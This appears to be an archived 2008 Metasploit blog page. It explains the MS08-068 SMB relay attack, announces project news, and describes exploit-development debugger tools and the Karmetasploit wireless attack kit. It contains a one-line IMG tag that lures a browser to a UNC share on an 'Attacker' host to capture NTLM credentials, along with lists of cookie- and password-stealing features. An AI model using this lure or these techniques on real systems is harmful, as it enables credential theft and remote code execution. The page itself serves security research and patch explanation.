The Metasploit Blog
Nov-12-2008 MS08-068: Metasploit and SMB Relay (hdm)
Today, Microsoft released bulletin MS08-068, which addresses a well-known flaw in the SMB authentication protocol. This attack was first publicly documented by Sir Dystic during @tlantacon in 2001 and implemented in Metasploit 3 in July of 2007. The attack abuses a design flaw in how SMB/NTLM authentication is implemented and works as follows.
The SMB client tries to access a remote SMB service on an attacker's machine. A user can be forced to access the SMB resource if they are running Internet Explorer or Outlook by sending them to a UNC link. This can be accomplished with an IMG tag like the following:
<img src="\\Attacker\Share\pic.jpg">
The attacker's SMB server is configured to deny access to anonymous users (NULL sessions). This forces Windows to authenticate using the username, domain, and password of the logged-in user. The password is first hashed based on the LANMAN/NTLM mechanism. During the authentication process, a random eight-byte challenge key is sent from the server to the client. The hashed LANMAN/NTLM password is then encrypted again with the server-supplied challenge key. The actual password hash sent across the network to the server is unique for a particular password and challenge key. The username and domain are sent in clear text.
The challenge key is where things get interesting. If the server intentionally picks a static challenge key for every connection, it is possible to perform a rainbow table attack against the password hash. In this scenario, the attacker would have precalculated the value of every possible password encrypted against the static challenge key. A set of rainbow tables for "HALF-LANMAN" hashes can be found at the Free Rainbow Tables web site. Even without a rainbow table, the challenge-key password hash can be brute forced with tools like Cain & Abel and Ophcrack. This is the attack implemented by the original version of SMB Relay and the SMB Capture module of the Metasploit Framework. The MS08-068 patch does not address this issue, since it's part of the protocol design.
Taking this further, the attacker can connect back to the victim, ask them for their challenge key, and then pass this key back to the victim's client connection. The client will then encrypt their hashed password against this key and send it to the attacker. The attacker then uses this hashed password to authenticate back to the victim, using their own credentials against them. This is the attack implemented by SMB Relay 2, the Metasploit Framework, and the one patched today in MS08-068.
The Metasploit module takes over the established, authenticated SMB session, disconnects the client, and uses the session to upload and execute shellcode in a manner similar to how psexec.exe operates. First, a Windows executable is created that acts like a valid Windows service and executes the specified Metasploit payload. This payload is then uploaded to the root of the ADMIN$ share of the victim. Once the payload has been uploaded, the Service Control Manager is accessed over DCERPC (using a named pipe over SMB) and used to create a new service (pointing at the uploaded executable) and then start it. This service creates a new suspended process, injects the shellcode into it, resumes the process, and shuts itself down. The module then deletes the created service. At this point, the attacker has a remote shell (or other payload session) on the victim.
There are some caveats. First, the victim must have ports 139 or 445 open and accessible to the attacker. Second, the victim's user account must have administrative access to their own machine. Third, if the victim's OS is Windows XP or 2003, they must have a password set for their account. Fourth, if the machine is XP, the system must be configured to allow remote network logins as the specified user and not Guest (the default). The exploitable setting becomes the default when the machine joins a Windows domain. Fifth, the user must have access to write to ADMIN$ and permissions to create and start Windows services. While most administrative accounts have these rights, domain policies can come into play. Finally, if SMB signing is configured as mandatory, this attack won't work because the signature will fail.
The MS08-068 patch addresses this attack only in the case where the attacker connects back to the victim. The patch works by checking the received challenge key against a list of active keys that its own SMB service has issued. If the challenge key matches the list, the authentication process fails. This form of the attack is described as "reflection" by the Microsoft SWI team. The Karmetasploit implementation uses this attack by default, providing remote code execution in any environment where Metasploit can influence the network of the victim (WPAD, WiFi, MITM, etc). This attack works great even in very isolated environments, such as an airplane full of Windows users at 30,000 feet. You can find more details on this form of the attack and its resolution on the SWI blog.
The patch does NOT address the case where the attacker relays the connection to a third-party host that the victim has access to. This can be accomplished by setting the SMBHOST parameter in the Metasploit smb_relay module to a third-party server. There are many cases where this is useful, especially in LAN environments where various tools authenticate to all local hosts with a domain administrator account (vulnerability scanners, inventory management, network monitor software, etc). In this situation, the attacker would relay the connection to another local system (domain controller, workstation, etc) and abuse this to obtain remote code execution. The third-party attack can also be used to relay inbound SMB credentials to a remote non-SMB service that accepts NTLM authentication (POP3, IMAP4, SMTP, HTTP via IIS, etc). More information about non-SMB NTLM relaying can be found at the Squirtle web site.
Mandatory SMB signing can prevent this attack, but it also breaks backwards compatibility with older operating systems. The MS08-068 patch is an elegant solution to a particular method of exploiting a design flaw, but it does not correct the flaw itself. This patch should be mandatory for road warriors and anyone who uses an untrusted network (wireless or otherwise), since without knowledge of or connectivity to a third-party host, the relayed credentials are not useful. The SMB protocol and NTLM authentication mechanism are quite fun to play with and relaying attacks are just the tip of the iceberg :-)
Update: Bob McMillan found this old advisory, which summarizes the reflection attack.
Update: Credit for the original discovery of the MITM/Relay method should be given to Dominique Brezinski, who published a paper on this topic in 1996 and spoke at Black Hat 1997.
-HD
Oct-13-2008 Uninformed Journal Volume 10 (hdm)
The Uninformed Journal has released volume 10! Skywing wrote a great article on bypassing client-side restrictions on the GPS device for the HTC Titan. Skape rocks it yet again with a new technique for bypassing malware unpackers using dual memory mappings. Mxatone digs into three vulnerabilities in win32k.sys that were patched with MS08-025 and demonstrates how to find and exploit bugs in this subsystem. Finally, I wrote an article on penetration testing IPv6 nodes on the local network, which is a detailed version of the SecTOR 2008 'Exploiting IPv6' mini-talk.
Oct-10-2008 Metasploit 3.2 BSD Licensing (hdm)
The slides from the talk egypt and I gave at SecTOR 2008 are now online. One of the highlights was a change in licensing -- instead of the existing EULA-like license, the 3.2 release will be provided under the 3-clause BSD license. The text below is an extended version of a rant I shared with Kelly Jackson Higgins over at Dark Reading.
The original version of Metasploit (1.0 and 2.x) was available dual-licensed under the GPL and Perl Artistic License. The goal was to make the framework interoperable with other security tools and help out other open source developers with a well-written codebase. However, once Metasploit 2 started to pick up steam (50,000+ users), we started to see commercial entities take advantage of the license to the detriment of the project.
In one case, a product vendor was selling laptops containing Metasploit 2 for the sole purpose of demonstrating how their product could detect it. The original license allowed for this, but we do want people who use the software to contribute back, and we want to make sure that any "demo" use is based on the original version of the software and not one that a vendor has modified. We never saw a bug fix, patch, or suggestion from the group within that vendor which was using it for this purpose. We want the Metasploit name to be consistent with a certain level of quality, which we could not guarantee when a vendor was using a possibly modified version to demonstrate their product's detection capabilities.
In another example, we noticed that a company which specializes in vulnerability assessment products had a Google Adword on the term "Metasploit". When we followed the link back to their web site, we saw a commercial exploit product which appeared to have exploit-for-exploit coverage matching the Metasploit Framework. Eventually, I spoke with a developer and a manager at this company and determined that they were not actually using the framework code. They were, however, using the Metasploit Framework as a reference to create their own "competitive" product. Again, this falls within the rules of the license, but between the Google Adwords, the competitive marketing materials, and the lack of any feedback, patches, or bug reports, we considered this to be a truly offensive use of our code.
When we (the original three developers of 2.x) started to work on the 3.0 version, we decided to take a new approach to licensing. We created a company to hold the rights to the new source code, transferred our copyrights to this company, and hired a lawyer to draw up a suitable license with our requirements. The goal was not to prevent commercial use, but to keep commercial entities from harming our project by using our own code against us. Once the new license was announced, we were surprised by the amount of support we received from the community. Our new license granted us redistribution rights to all contributions we received. Our contributors were still happy to send in patches and improvements under this license.
Fast-forward two years and we have a codebase of over 300,000 lines of Ruby code (not including all of the assembler and C), a massive user base, a strong community of contributors, and a decent reputation as a software project. The license successfully prevented the types of abuses that we found so annoying with the 2.x versions. Since the original 3.0 release, there have been some organizational changes within the project, including the loss of both spoonm and skape as core developers. Filling their shoes are mc, egypt, patrickw, et, I)ruid, ramon, pusscat, and a handful of other folks from the community.
Of the three members of the holding company that owns the Metasploit source code and trademarks, I am the only one still involved in the project. This situation is what led to the new license. We have a new group of core developers and a handful of contributors who were limited in what they could do with the framework because of the license. Since the 3.0 release, the project has come a long way, both in terms of features and industry recognition. We believed that changing the license to be as open as possible (BSD 3-clause is nearly public domain) would not only be fair to the new developers, but allow us to expand beyond the original goal as an exploit platform and become the basis for a wide variety of new projects.
The new license will lead to commercial abuse, but I believe that the project is now strong enough to succeed even with competition from commercial entities that are using our source code. The key to our success is the Metasploit community and our dedication to sharing security information (and code) in a timely fashion. Metasploit is great at destroying FUD, whether the source is an incompetent product vendor or a media-happy security company.
The new license allows a new level of customization and purpose-specific derivatives. It's entirely likely that we will see new projects targeted at individual sectors and applications (SCADAsploit, anyone?), which we hope will filter some improvements back to the core project. By opening the license to the entire Metasploit codebase, we have let the proverbial cats out of the bag; it's now just a matter of counting kittens.
-HD
Sep-25-2008 Metasploit (2**5/10.0) (hdm)
Silence can mean one of two things - the project is dead, or we are working on some really big things and aren't quite ready to announce them. Well, the project is not dead :-) In the next two weeks, some major changes will be announced that cover the source code, development team, and licensing of the Metasploit Framework. Folks who have been following the development tree may not be surprised, but we are taking some giant steps forward from the 3.1 release.
In the meantime, users should stay away from Ruby 1.8.7. Over the last few months, more and more OS distributions have been upgrading their standard Ruby interpreters from 1.8.5/1.8.6 to 1.8.7. Unfortunately, this version broke the ability to use short-name constants. This type of code is scattered throughout the Metasploit Framework and is tricky to track down. Even knowing what the problem is, there is no clean workaround that doesn't throw out the benefits of using short-name constants in the first place (which are used to make code readable among other things). How can you tell if you hit this bug? The error below is just one example:
[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR
In the short-term, the framework will display a warning message if the interpreter version matches "1.8.7". Once the Ruby team pushes a new version that incorporates the patch (which is already in the stable development tree), this warning will be removed, and a more complex check will be put in place instead.
If anyone is looking for a deeper understanding of the framework and many of the new features, there are still a few seats left in my Powersploitation class at the SecTor 2008 Security Conference. You can tell the class material is fresh when the code it refers to is still being written ;-)
Aug-25-2008 Improved WinDBG opcode searching (Pusscat)
Being goaded by some coworkers about the opcode searching functionality of windbg prompted me to add a new option to jutsu today: searchOpcode
You can search for a set of instructions in conjunction: it will assemble them, show you the resulting machine code, and then search executable memory for that byte sequence. Instructions are delimited by pipes. I plan to add some limited wildcard functionality in the near future as well.
0:000> !jutsu searchOpcode pop ecx | pop ecx | ret
[J] Searching for:
> pop ecx
> pop ecx
> ret
[J] Machine Code:
> 59 59 c3
[J] Opcode sequence found at: 0x004012f9
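The workflow in the session above (parse the pipe-delimited list, assemble it, scan only executable memory, report absolute addresses) is small enough to model in a few dozen lines. The following is an added example written for this post, not jutsu's own code: its opcode table is a toy covering only single-byte encodings, and the memory image it searches is constructed so that the hit lands at the address the session shows, with a copy of the same bytes in a non-executable region that must be skipped.

```python
import re

# Toy opcode table (constructed for this example): single-byte x86 encodings
# of the instructions the post searches for plus a few neighbours. A real
# assembler covers the full instruction set; this one only needs to show the
# search workflow.
OPCODES = {
    "pop eax": b"\x58", "pop ecx": b"\x59", "pop edx": b"\x5a", "pop ebx": b"\x5b",
    "pop esp": b"\x5c", "pop ebp": b"\x5d", "pop esi": b"\x5e", "pop edi": b"\x5f",
    "ret": b"\xc3", "nop": b"\x90", "int 3": b"\xcc",
}

def parse_sequence(text: str) -> list:
    """Split a pipe-delimited instruction list, normalising case and spacing."""
    parts = [re.sub(r"\s+", " ", p.strip().lower()) for p in text.split("|")]
    return [p for p in parts if p]

def assemble(text: str) -> bytes:
    """Turn the instruction list into the byte sequence to search for."""
    machine_code = b""
    for insn in parse_sequence(text):
        if insn not in OPCODES:
            raise ValueError("unsupported instruction in toy assembler: %r" % insn)
        machine_code += OPCODES[insn]
    return machine_code

class Region:
    """A memory region as the search sees it: base address, contents, and
    whether the page is executable."""
    def __init__(self, base, data, executable):
        self.base, self.data, self.executable = base, data, executable

def search_opcode(text: str, regions) -> list:
    """Return every absolute address where the assembled sequence appears in
    executable memory (overlapping matches included). Non-executable regions
    are skipped: a match in data is not a usable return address."""
    needle = assemble(text)
    hits = []
    for region in regions:
        if not region.executable:
            continue
        idx = region.data.find(needle)
        while idx != -1:
            hits.append(region.base + idx)
            idx = region.data.find(needle, idx + 1)
    return hits

def sample_regions():
    """Constructed memory image: a code region holding 59 59 c3 at the
    address the post reports, and a data region holding the same bytes."""
    code = bytearray(b"\x90" * 0x1000)
    code[0x2f9:0x2fc] = b"\x59\x59\xc3"
    data = bytearray(b"\x00" * 0x100)
    data[0x10:0x13] = b"\x59\x59\xc3"
    return [Region(0x00401000, bytes(code), True),
            Region(0x00403000, bytes(data), False)]

if __name__ == "__main__":
    query = "pop ecx | pop ecx | ret"
    print("Machine code:", assemble(query).hex(" "))
    for addr in search_opcode(query, sample_regions()):
        print("Opcode sequence found at: 0x%08x" % addr)
```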
Aug-20-2008 Byakugan WinDBG Plugin Released! (Pusscat)
Today, HD merged in an amalgamation of windbg tools and plugins with a funny name into the main metasploit tree. We've been working on this collection for awhile now, and currently it represents (I think) a good step towards turning windbg from simply a good debugger into a powerful platform for exploit development.
The work that's currently released includes:
tenketsu - the vista heap emulator/visualizer which allows you to track how input to a program affects the heap in real time.
jutsu - a set of tools for tracking buffers through memory, determining what is controlled at crash time, and discovery of valid relative return addresses based on it
mushishi - a framework (with examples) for the detection and defeat of anti-debugging methods.
Used in conjunction with metasploit, jutsu in particular can significantly speed up exploit development time as it understands and makes use of msfpattern buffers natively. The README file can be found in the tree at external/source/byakugan/README and details functionality, usage, build, and installation. For the slides from the preliminary release at toorcon seattle, go here.
Currently we're looking for more suggestions for functionality. Anything that you do commonly and think may be automatable is up for discussion.
Aug-08-2008 Karmetasploit Wireless Fun (hdm)
I just posted the first public documentation on Karmetasploit. This project is a combination of Dino Dai Zovi and Shane Macaulay's KARMA and the Metasploit Framework. The result is an extremely effective way to absorb information and remote shells from the wireless-enabled machines around you. This first version is still a proof-of-concept, but it already has an impressive feature list:
- Capture POP3 and IMAP4 passwords (clear-text and SSL)
- Accept outbound email sent over SMTP
- Parse out FTP and HTTP login information
- Steal cookies from large lists of popular web sites
- Steal saved form fields from the same web sites
- Use SMB relay attacks to load the Meterpreter payload
- Automatically exploit a wide range of browser flaws
One of the cool features is the probe-to-beacon code that we submitted as a patch to airbase-ng. Windows XP and Mac OS X systems use probe requests to determine if any of their preferred wireless networks are in range. Windows Vista no longer sends probes, instead it listens for a beacon containing the name of a preferred network. The new feature of airbase-ng (-C XX) allows one probing client to be used to discover a client that is listening for beacons. This works by rebroadcasting all probed networks as beacons for a short period of time. The result is that all actively-probing clients can be used to discover passive clients that are listening for the same network name :-)
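The probe-to-beacon behaviour described above has a recognisable signature from the defender's side: one BSSID that starts beaconing every SSID clients have just probed for, rather than the one or two networks a real access point serves. The following detection heuristic is an added example for this post, not part of Karmetasploit or airbase-ng; the frame records, MAC addresses, SSIDs and the time window are all constructed for the demonstration.

```python
from collections import defaultdict

# Constructed capture: (time_seconds, frame_type, sender_mac, ssid).
# "probe"  = probe request from a client naming a preferred network;
# "beacon" = beacon from an access point advertising an SSID.
SAMPLE_FRAMES = [
    (0.0,  "probe",  "aa:aa:aa:00:00:01", "HomeNet"),
    (0.5,  "beacon", "00:0c:41:11:11:11", "HomeNet"),      # the real home AP
    (1.0,  "probe",  "aa:aa:aa:00:00:01", "CoffeeShop"),
    (1.2,  "probe",  "aa:aa:aa:00:00:02", "AirportFree"),
    (1.5,  "beacon", "de:ad:be:ef:00:01", "HomeNet"),      # echoed probe
    (1.6,  "beacon", "de:ad:be:ef:00:01", "CoffeeShop"),   # echoed probe
    (1.7,  "beacon", "de:ad:be:ef:00:01", "AirportFree"),  # echoed probe
    (40.0, "beacon", "00:0c:41:22:22:22", "CoffeeShop"),   # outside the window
]

def probe_echoing_aps(frames, window=10.0, min_ssids=3):
    """Return {bssid: sorted SSIDs} for every AP that beaconed at least
    `min_ssids` distinct SSIDs, each within `window` seconds after some
    client probed for that SSID. A normal AP advertises its own network(s)
    whether or not anyone asks; an AP that mirrors whatever clients probe
    for is the pattern the probe-to-beacon rebroadcast produces. The
    window and threshold are tuning assumptions, not measured values."""
    last_probe = {}                      # ssid -> time of most recent probe
    echoed = defaultdict(set)            # bssid -> SSIDs it echoed
    for t, kind, mac, ssid in sorted(frames):
        if kind == "probe":
            last_probe[ssid] = t
        elif kind == "beacon":
            probed_at = last_probe.get(ssid)
            if probed_at is not None and 0 <= t - probed_at <= window:
                echoed[mac].add(ssid)
    return {mac: sorted(s) for mac, s in echoed.items() if len(s) >= min_ssids}

if __name__ == "__main__":
    for bssid, ssids in probe_echoing_aps(SAMPLE_FRAMES).items():
        print("%s beacons %d probed SSIDs: %s" % (bssid, len(ssids), ", ".join(ssids)))
```

On a real capture the frames would come from a monitor-mode interface and the probe map would need ageing, but the discriminating feature stays the same: count distinct probed SSIDs per BSSID, not beacons per SSID, since the legitimate AP in the sample also beacons a probed name and must not be flagged on that alone.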
Aug-04-2008 Best of Open Source Software Awards (2008) (hdm)
InfoWorld has just released the Best of Open Source Software Awards. The Metasploit Framework received an award in the category of Best of open source in security:
"When we first saw Metasploit back in 2004 at the DefCon hacker conference, we knew it would become a staple for security professionals the world over. And sure enough, Metasploit has become the de facto standard attack and penetration toolkit. Extremely extensible, and constantly updated to home in on the latest server and host vulnerabilities, Metasploit has the right stuff to test the perimeter of your network for holes, or determine whether your SQL or Web server or Unix, Linux, or Windows host can be compromised. If you have important systems to protect, point Metasploit at them yourself before someone else does."
